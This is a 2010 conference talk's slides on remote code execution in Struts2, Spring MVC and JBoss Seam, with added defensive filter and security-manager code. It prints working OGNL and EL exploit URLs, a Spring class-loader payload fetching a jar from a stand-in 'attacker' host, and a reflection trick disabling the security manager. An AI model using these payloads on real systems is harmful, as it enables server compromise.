![Page 1: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/1.jpg)
Milking a horse or
executing remote code in modern Java frameworks
Meder Kydyraliev, blog.o0o.nu
...if you thought that neither was possible, you were wrong
Kumys is a fermented dairy product traditionally made from mare's milk by nomads of Central Asia
http://en.wikipedia.org/wiki/File:Mare_milking_Suusamyr.jpg CC-BY-SA
...back to security
Evolution of web frameworks
Plain old servlet
```java
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class MyServlet extends HttpServlet {
    public void doGet(HttpServletRequest req, HttpServletResponse res)
            throws ServletException, IOException {
        PrintWriter out = res.getWriter();
        String name = req.getParameter("name");
        out.println("Hello, " + name + ". How are you?");
        out.close();
    }
}
```
Separation of controller and view
```java
public void doGet(HttpServletRequest req, HttpServletResponse res)
        throws ServletException, IOException {
    int userId = Integer.parseInt(req.getParameter("uid"));
    User user = lookupUser(userId);
    req.setAttribute("user", user);
}
```
hello.jsp:
```jsp
...
<% User user = (User) request.getAttribute("user"); %>
Hello, <%= user.getName() %>. How are you?
```
Problems
a lot of verbose boilerplate code
type conversion (including lists, arrays, etc)
input validation
object creation (calling setters/getters manually)
early frameworks/libraries asked to extend classes and implement interfaces
lots of XML configuration files
Hey, let us take care of the boilerplate code. You write POJOs, we
do the rest.
[Chart: user code complexity vs. framework code complexity]
[Word cloud of Java technologies: JSP, JMX, JSF, Beans, AOP, EJB, JMS, JCA, ORM, OXM, JSTL, Facelets, Pagelets, Groovy, JAX, Richfaces, Guice, Hibernate, DWR, OSGi, Seam, Xwork, Struts, WebWork]
How secure are these Java frameworks?
Previous vulnerabilities
Struts/Xwork
bunch of XSS bugs
directory traversal (CVE-2008-6505)
command execution through input validation (CVE-2007-4556)
Spring framework
remote regexp DoS (CVE-2009-1190)
Approach
Use IDE (e.g. IntelliJ IDEA) for easier navigation
Dependency injection
Debugging: breakpoints, stepping, etc
Use sample apps provided with framework
Ensures better coverage
Took about 5 man-days to find and exploit each bug
Look at how framework implements its magic
Apache Struts2
Nifty features
Rich tag library (e.g. AJAXy tags):
<s:div id="div" />
<sx:a targets="div" value="Make Request" href="%{#url}" />
OGNL:
Tags: <s:property value="#session.user.username" />
HTTP parameters: user.address.city=Bishkek
The two OGNL expressions above become:
#session.user.username becomes ActionContext.getContext().getSession().get("username")
user.address.city=Bishkek becomes action.getUser().getAddress().setCity("Bishkek")
OGNL (Object Graph Navigation Language)
ANTLR-based parser
Features:
Properties setting/getting: foo.bar=baz becomes action.getFoo().setBar(“baz”)
Method calling: foo() and @java.lang.System@exit(1)
Constructor calling: new MyClass()
Ability to save arbitrary objects in OGNL context: #foo = new MyClass()
HTTP parameters == OGNL statements
What prevents attacker from doing the following?
http://victim/[email protected]@exit(1)=meh
Method execution is guarded by:
OgnlContext‘s property xwork.MethodAccessor.denyMethodExecution
SecurityMemberAccess private field allowStaticMethodAccess
CVE-2010-1870
Based on my previous bug: XW-641
# denotes references to variables in OGNL
Special OGNL variables:
#application
#session
#root
#request
#parameters
#attr
ParametersInterceptor blacklists # to prevent tampering with server-side data
XW-641
('\u0023' + 'session[\'user\']')(unused)=0wn3d
The parameter name above is evaluated as:
#session['user']=0wn3d
which becomes:
ActionContext.getContext().getSession().put("user", "0wn3d")
XW-641 fix was to clear the value stack
CVE-2010-1870
There are actually more special variables available:
#root
#this
#_typeResolver
#_classResolver
#_traceEvaluations
#_lastEvaluation
#_keepLastEvaluation
#_memberAccess
#context
CVE-2010-1870
#_memberAccess - SecurityMemberAccess guarding method execution with allowStaticMethodAccess private field
#context - OgnlContext, the one guarding method execution using xwork.MethodAccessor.denyMethodExecution property
Both guards are reachable from an OGNL statement:
#_memberAccess['allowStaticMethodAccess'] = true
#context['xwork.MethodAccessor.denyMethodExecution'] = false
CVE-2010-1870 exploit
CVE-2010-1870 exploit
#_memberAccess['allowStaticMethodAccess'] = true
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec("touch /tmp/KUMYS", null)
#foo = new java.lang.Boolean("false")
CVE-2010-1870 exploit
/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023rt\[email protected]@getRuntime())(\u0023rt.exec('mkdir\u0020/tmp/PWNED'\u002cnull)))=1
CVE-2010-1870 fix
2.2.1 fixes vulnerability (~3 months)
Workaround is either:
whitelist A-z0-9_[].'
use "params" interceptor's excludeParams parameter to blacklist:
\u ( )
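The two workarounds on the slide can be checked before a parameter name ever reaches OGNL. The following is an added illustration, not Struts' own ParametersInterceptor: the class name ParamNameFilter, its methods and the sample parameter names in main are all assumptions of this example, and the accept-list is tightened to A-Za-z rather than the slide's ASCII range A-z (which would also admit [ \ ] ^ _ and backtick). The deny-list rejects a literal backslash-u escape (used to smuggle the # character past the interceptor's check) and parentheses (which make OGNL evaluate a string as an expression).

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Pattern;

// Illustrative parameter-name filter (assumed name; not Struts' own code).
// A parameter name is accepted only if every character is on the accept-list
// and none of the deny-listed tokens appears.
public class ParamNameFilter {

    // Accept-list: letters, digits, '_', '.', '[', ']' and the single quote
    // used for map keys, enough for paths such as user.address.city or session['user'].
    private static final Pattern ACCEPTED = Pattern.compile("^[A-Za-z0-9_.\\[\\]']+$");

    // Deny-list: a literal "\u" escape sequence and parentheses.
    private static final Pattern DENIED = Pattern.compile("\\\\u|[()]");

    public static boolean isAccepted(String paramName) {
        return paramName != null
            && ACCEPTED.matcher(paramName).matches()
            && !DENIED.matcher(paramName).find();
    }

    // Returns only the parameters that may be handed to OGNL; rejected names are
    // logged because they are a strong signal of an injection attempt.
    public static Map<String, String[]> filter(Map<String, String[]> params) {
        Map<String, String[]> safe = new LinkedHashMap<>();
        for (Map.Entry<String, String[]> e : params.entrySet()) {
            if (isAccepted(e.getKey())) {
                safe.put(e.getKey(), e.getValue());
            } else {
                System.err.println("dropping suspicious parameter name: " + e.getKey());
            }
        }
        return safe;
    }

    public static void main(String[] args) {
        // Constructed sample parameter names, taken from the shapes shown on the slides.
        String[] names = {
            "user.address.city",                                              // ordinary property path
            "session['user']",                                                // map key access
            "('\\u0023' + 'session[\\'user\\']')(unused)",                    // XW-641 shape
            "('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)",   // CVE-2010-1870 shape
            "#session['user']",                                               // '#' is not on the accept-list
        };
        for (String n : names) {
            System.out.println((isAccepted(n) ? "accept " : "reject ") + n);
        }
    }
}
```

The accept-list alone already rejects every payload on the slides; the deny-list is kept as a second, independent check so that a later loosening of the accept-list does not silently reopen the two tokens the exploit depends on.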
Spring MVC
Spring
Spring MVC is Spring’s web framework
uses Java Beans API (java.beans.*)
A lot of components (AOP, etc)
java.beans.Introspector
The following API returns bean information about the specified class (properties, setter/getter methods, etc):
BeanInfo getBeanInfo(Class beanClass);
BeanInfo getBeanInfo(Class beanClass, Class stopClass);
```java
class Person {
    private String firstName;
    private String lastName;
    public String getFirstName() { return firstName; }
    public String getLastName() { return lastName; }
    public void setFirstName(String firstName) { this.firstName = firstName; }
    public void setLastName(String lastName) { this.lastName = lastName; }
}
```
HTTP parameters: firstName=Tavis&lastName=Ormandy
BeanInfo getBeanInfo(Class beanClass);
Introspector.getBeanInfo(Person); returns the following properties (the class property comes from Object.class, not Person.class):
```text
firstName
lastName
class
  classLoader
    jarPath
    antiJARLocking
    workDir
    URLs
      [0] = file:///www/WEB-INF/lib
      [1] = file:///www/tomcat/lib
```
CVE-2010-1622
Incorrect usage of the Beans API exposes org.apache.catalina.loader.WebappClassLoader's URL paths:
class.classLoader.URLs[0]=file:///tmp/
The overridden path isn't used to resolve classes
But Jasper (Apache's JSP engine) uses the overridden paths to resolve JSP tag libraries (TLD)
CVE-2010-1622
Two problems:
How do we execute code using a TLD file?
How do we supply an attacker-controlled TLD remotely?
Executing code via TLD
A TLD file defines which classes handle custom tags:
<form:form method="post" commandName="/meh"></form:form>
Instead of classes it's possible to specify tag files:
```xml
<tag-file>
  <name>input</name>
  <path>/META-INF/tags/InputTag.tag</path>
</tag-file>
```
InputTag.tag
```jsp
<%@ tag dynamic-attributes="dynattrs" %>
<%
    Runtime r = java.lang.Runtime.getRuntime();
    r.exec("mkdir /tmp/PWNED");
%>
```
How do we supply TLD and tag files remotely?
Jasper uses java.net.URL to scan JARs
java.net.URL automatically handles remote JAR URLs:
jar:http://attacker/spring-form.jar!/
Tag files are retrieved from the same JAR!!!
CVE-2010-1622 exploit
Download org.springframework.web.servlet-X.X.X.RELEASE.jar
Edit spring-form.tld and add tag file definitions for all tags. Example for the <form:input> tag:
```xml
<tag-file>
  <name>input</name>
  <path>/META-INF/tags/InputTag.tag</path>
</tag-file>
```
Create the corresponding tag files, e.g. InputTag.tag:
```jsp
<%@ attribute name="path" required="true" %>
<%@ attribute name="id" required="false" %>
<% java.lang.Runtime.getRuntime().exec("mkdir /tmp/PWNED"); %>
```
Bundle everything back into spring-form.jar and put it up online
Submit a POST request to a form controller with the following parameter:
class.classLoader.URLs[0]=jar:http://attacker/spring-form.jar!/
CVE-2010-1622 fix
Spring disallows access to class.classLoader
Fixed in the following versions:
Spring Framework 3.0.3/2.5.6.SEC02/2.5.7.SR01
The proper fix is to use the Introspector API correctly and specify the stop class:
Introspector.getBeanInfo(Person.class, Object.class);
Other projects may be vulnerable to this bug too.
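The difference between the two Introspector calls can be seen with nothing but the JDK. The program below is an added illustration, not Spring's code: IntrospectorStopClassDemo, its nested Person bean and the readPath helper are assumptions of this example. It lists the property names a binder would see with and without Object.class as the stop class, and then walks the dotted path class.classLoader through read methods only, to show that the unfiltered descriptors make the class loader reachable from a plain bean.

```java
import java.beans.BeanInfo;
import java.beans.IntrospectionException;
import java.beans.Introspector;
import java.beans.PropertyDescriptor;
import java.util.ArrayList;
import java.util.List;

// Added demo of the CVE-2010-1622 root cause (assumed class name; not Spring's code).
public class IntrospectorStopClassDemo {

    // Minimal bean with the same shape as the Person class on the slides.
    public static class Person {
        private String firstName;
        private String lastName;
        public String getFirstName() { return firstName; }
        public void setFirstName(String firstName) { this.firstName = firstName; }
        public String getLastName() { return lastName; }
        public void setLastName(String lastName) { this.lastName = lastName; }
    }

    // Properties reported without a stop class: the vulnerable call on the slides.
    // Object.getClass() shows up as a readable property named "class".
    public static List<String> propertiesWithoutStopClass(Class<?> bean) throws IntrospectionException {
        return names(Introspector.getBeanInfo(bean));
    }

    // Properties reported with Object.class as stop class: the fix on the slides.
    // Everything inherited from java.lang.Object is excluded.
    public static List<String> propertiesWithStopClass(Class<?> bean) throws IntrospectionException {
        return names(Introspector.getBeanInfo(bean, Object.class));
    }

    private static List<String> names(BeanInfo info) {
        List<String> out = new ArrayList<>();
        for (PropertyDescriptor pd : info.getPropertyDescriptors()) {
            out.add(pd.getName());
        }
        return out;
    }

    // Follows a dotted property path using only getters, the way a naive binder
    // resolves nested properties; here it is used to show what is reachable.
    public static Object readPath(Object root, String path) throws Exception {
        Object current = root;
        for (String segment : path.split("\\.")) {
            PropertyDescriptor match = null;
            for (PropertyDescriptor pd : Introspector.getBeanInfo(current.getClass()).getPropertyDescriptors()) {
                if (pd.getName().equals(segment) && pd.getReadMethod() != null) {
                    match = pd;
                }
            }
            if (match == null) {
                throw new IllegalArgumentException("no readable property '" + segment + "'");
            }
            current = match.getReadMethod().invoke(current);
        }
        return current;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("without stop class: " + propertiesWithoutStopClass(Person.class));
        System.out.println("with stop class:    " + propertiesWithStopClass(Person.class));
        Object loader = readPath(new Person(), "class.classLoader");
        System.out.println("class.classLoader resolves to: " + loader.getClass().getName());
    }
}
```

Run it with any JDK; the first list contains class, the second does not, and the last line prints the name of the application class loader, which is the object whose URLs property the slides go on to overwrite. The point for a binder is that the stop class must be applied when building the property map, not only when a request happens to name class explicitly.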
JBoss Seam
Java Reflection 101
```java
import java.lang.reflect.Method;

String strInstance = "HITB KUL 2010";
Class<?> clz = Class.forName("java.lang.String");
Method lenMethod = clz.getDeclaredMethod("length", new Class[] {});
int strlen = (Integer) lenMethod.invoke(strInstance, new Object[] {});
```
JBoss Seam
Combines EJB3 with JSF
POJOs + annotations
JBoss Unified Expression Language
JBoss EL
Format: #{expression}
Supports method calling: #{object.method()}
Various predefined variables: request, session, etc.
Container indexing support: #{foo()[123]}
Projection (iteration): #{company.departments.{d|d.name}}
CVE-2010-1871
A special HTTP parameter (actionOutcome) controlled where the browser should be redirected after an action
If the supplied URL started with / and contained HTTP parameters, all JBoss EL expressions in the parameter values were executed. The payload is built up step by step:
#{expr}
%23{expr}
pwned%3d%23{expr}
/seam?actionOutcome=/p.xhtml%3fpwned%3d%23{expr}
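The root cause here is that a redirect target taken from the request is later treated as a template. The check below is an added illustration and not JBoss Seam's own fix; ActionOutcomeCheck, its methods and the sample values in main are assumptions of this example. It percent-decodes the value until it stops changing, so that %23{ and double-encoded %2523{ collapse to their plain form, rejects any EL delimiter, and then accepts only a bare same-site path with no query string, which removes the parameter-value surface the slide describes.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Added validator for a request-supplied redirect target (assumed name; not Seam's code).
public class ActionOutcomeCheck {

    private static final int MAX_DECODE_ROUNDS = 3;

    // Percent-decodes repeatedly so nested encodings collapse to the form the
    // EL evaluator would eventually see. Stops early once a round changes nothing.
    public static String fullyDecode(String value) {
        String current = value;
        for (int i = 0; i < MAX_DECODE_ROUNDS; i++) {
            String next = URLDecoder.decode(current, StandardCharsets.UTF_8);
            if (next.equals(current)) {
                break;
            }
            current = next;
        }
        return current;
    }

    public static boolean isSafeActionOutcome(String rawValue) {
        if (rawValue == null || rawValue.isEmpty()) {
            return false;
        }
        String decoded;
        try {
            decoded = fullyDecode(rawValue);
        } catch (IllegalArgumentException malformedPercentSequence) {
            return false;
        }
        // EL delimiters must never survive into a value that is evaluated later.
        if (decoded.contains("#{") || decoded.contains("${")) {
            return false;
        }
        // Only a same-site relative path is accepted: exactly one leading slash
        // (so no scheme and no protocol-relative "//"), no query string, no
        // backslashes, no CR/LF and no parent-directory segments.
        if (!decoded.startsWith("/") || decoded.startsWith("//")) {
            return false;
        }
        if (decoded.contains("?") || decoded.contains("\\") || decoded.contains("..")
                || decoded.contains("\r") || decoded.contains("\n")) {
            return false;
        }
        return decoded.matches("/[A-Za-z0-9_./-]*");
    }

    public static void main(String[] args) {
        // Constructed samples following the shape of the slide's payload.
        String[] samples = {
            "/home.xhtml",                       // plain page: allowed
            "/p.xhtml%3fpwned%3d%23{expr}",      // the slide's payload: rejected
            "/p.xhtml?pwned=%2523{expr}",        // double-encoded delimiter: rejected
            "//evil.example/",                   // protocol-relative redirect: rejected
        };
        for (String s : samples) {
            System.out.println((isSafeActionOutcome(s) ? "allow  " : "reject ") + s);
        }
    }
}
```

Decoding to a fixed point before inspecting the value is the part that matters: a single-pass check for #{ would pass the second sample, and a single-pass check for %23{ would pass the third.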
CVE-2010-1871 exploit
How to execute OS commands via JBoss EL?
can't reference java.lang.Runtime directly, since resolvers won't know how to resolve 'java'
Reflection!!!
Every Object has Class getClass()
And Class has Class forName(String), which returns a class based on the supplied name:
view.getClass.forName('java.lang.Runtime')
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
![Page 67: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/67.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()
![Page 68: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/68.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()java.lang.reflect.Method[]
![Page 69: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/69.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()
(returns java.lang.reflect.Method[]; element [19])
![Page 70: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/70.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()
(returns java.lang.reflect.Method[]; element [19])
.invoke()
![Page 71: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/71.jpg)
CVE-2010-1871 exploit
To call java.lang.Runtime.exec() we need to:
obtain java.lang.Runtime reference via static reflection call to Runtime.getRuntime(), by finding its index in the array returned by Class.getDeclaredMethods()
pass the above reference to Runtime.exec() reflection call, which we also invoke by its index
![Page 72: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/72.jpg)
How do we get method’s index?
/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19]}
/seam-booking/pwn.xhtml?pwned=public+java.lang.Process+java.lang.Runtime.exec(java.lang.String)+throws+java.io.IOException&cid=21
![Page 74: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/74.jpg)
CVE-2010-1871 exploit
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),
'mkdir /tmp/PWNED')
![Page 75: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/75.jpg)
CVE-2010-1871 exploit
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),
'mkdir /tmp/PWNED')
[19]: Method for Runtime.exec(String)
[7]: Method for Runtime.getRuntime()
![Page 77: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/77.jpg)
CVE-2010-1871 exploit
/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null), 'mkdir /tmp/PWNED')}
![Page 78: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/78.jpg)
Demo
![Page 79: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/79.jpg)
![Page 80: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/80.jpg)
Java web frameworks are complex and are bound to have more bugs
![Page 81: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/81.jpg)
![Page 82: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/82.jpg)
But there’s hope
Java Security Manager
![Page 83: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/83.jpg)
What’s Java security manager?
Singleton with a bunch of checkXXX() methods
Various classes in JRE (e.g. File, Socket, etc) have a check similar to the following:
SecurityManager security = System.getSecurityManager();
if (security != null) {
    security.checkXXX(argument, ...);
}
![Page 84: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/84.jpg)
java.lang.ProcessBuilder
...
SecurityManager security = System.getSecurityManager();
if (security != null)
    security.checkExec(prog);
...
![Page 85: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/85.jpg)
Are you using Java security manager?
![Page 86: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/86.jpg)
Are you using Java security manager? (audience poll)
No: 20
Yes: 7
![Page 87: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/87.jpg)
Why is nobody using it?
![Page 88: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/88.jpg)
Problems
Originally designed to run untrusted code, not to prevent vulnerabilities
Performance. Security manager calls happen on:
getting class loader, creating class loader
calling setAccessible() or getting declared members (used by reflection)
getting system properties, env vars
getting java.util.logging.Logger
Permissions are assigned based on paths or entities that signed JARs
![Page 89: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/89.jpg)
Problems (cont.)
Support for privileged blocks
code with higher permissions can use the doPrivileged API to grant its permissions to the callers
Sami Koivu’s bugs
![Page 90: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/90.jpg)
How do we solve these?
Create a custom Java security manager, which:
will NOT care about classloaders, reflection* and properties
will NOT care about doPrivileged blocks, protection domains or code sources
will care about:
file access (read, write, exec)
socket access
getDeclaredField/setAccessible* reflection calls
will support per class permissions by examining stack
![Page 92: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/92.jpg)
Reflection
* Reflection can be used to disable any security manager:
Field security = System.class.getDeclaredField("security");
security.setAccessible(true);
security.set(null, null);
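The "lean" manager sketched on the previous slides (ignore class loaders, properties and doPrivileged; gate file writes, exec, sockets and setAccessible(); decide per class by examining the stack), written out as an added example. This is not the talk's code and not the manas-java-security project; the class names in POLICY are hypothetical, and file reads are left ungated because the JRE itself reads files constantly (class loading, resources).

```java
import java.lang.reflect.ReflectPermission;
import java.security.Permission;
import java.util.Map;
import java.util.Set;

// Added example (not the talk's code, not manas-java-security): a lean manager that
// only gates exec, file writes, sockets and setAccessible(), deciding per class by
// walking the stack. Class names in POLICY are hypothetical.
public class LeanSecurityManager extends SecurityManager {

    // Per-class permissions: which application classes may do what.
    private static final Map<String, Set<String>> POLICY = Map.of(
        "com.example.reports.PdfRenderer", Set.of("exec", "write"),
        "com.example.mail.SmtpClient",     Set.of("connect"));

    // Ignore class loaders, properties, doPrivileged and protection domains (the
    // costly generic checks). The one generic permission still gated is the
    // ReflectPermission behind setAccessible(true), the call that can null out
    // System.security and so disable any manager.
    @Override public void checkPermission(Permission p) {
        if (p instanceof ReflectPermission && "suppressAccessChecks".equals(p.getName())) {
            decide("reflect", p.getName());
        }
    }
    @Override public void checkPermission(Permission p, Object ctx) { checkPermission(p); }
    @Override public void checkExec(String cmd)               { decide("exec", cmd); }
    @Override public void checkWrite(String file)             { decide("write", file); }
    @Override public void checkConnect(String host, int port) { decide("connect", host + ":" + port); }

    // The nearest non-JRE frame is judged, so an EL resolver reaching Runtime.exec()
    // through reflection is denied regardless of the trusted JRE frames above it.
    private void decide(String action, String target) {
        for (Class<?> frame : getClassContext()) {
            String name = frame.getName();
            if (frame == LeanSecurityManager.class || name.startsWith("java.")
                    || name.startsWith("jdk.") || name.startsWith("sun.")) {
                continue; // skip ourselves and the JRE; find the application caller
            }
            if (!POLICY.getOrDefault(name, Set.of()).contains(action)) {
                throw new SecurityException(name + " may not " + action + ": " + target);
            }
            return; // nearest application class is allowed; stop walking
        }
        // Only JRE frames on the stack: an internal call, allowed.
    }
}
```

Install it with -Djava.security.manager=LeanSecurityManager (class on the classpath); note that the SecurityManager API was deprecated for removal in Java 17 (JEP 411), so this reflects the design discussed in the talk rather than a current platform control.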
![Page 93: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/93.jpg)
Pros
Will address some of the performance concerns
Will be more flexible in permission assignment (per class permissions)
Will be able to detect and prevent serious vulnerabilities:
Path traversal bugs
Command execution bugs
External XML entity inclusion bugs
![Page 94: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/94.jpg)
Cons
Will not prevent custom application code abuse:
BankTransaction t = new BankTransaction();
t.setAccFrom("123");
t.setAccTo("Attacker's account");
t.setAmount(1000000);
t.commit();
Policy will have to grant privileges to JRE files (which is transparent otherwise due to doPrivileged blocks)
![Page 95: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/95.jpg)
Where’s the code?
Alpha version will be released at:
http://code.google.com/p/manas-java-security/
![Page 96: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/96.jpg)
Ideas for you
Java web frameworks have been ignored for a long time
Current support for bytecode instrumentation (BCI) via Java agents (ClassFileTransformer API) should let you:
implement dynamic taint propagation
instrument String to always return true for indexOf(), contains(), etc methods to find magic characters
![Page 97: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/97.jpg)
![Page 98: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/98.jpg)
?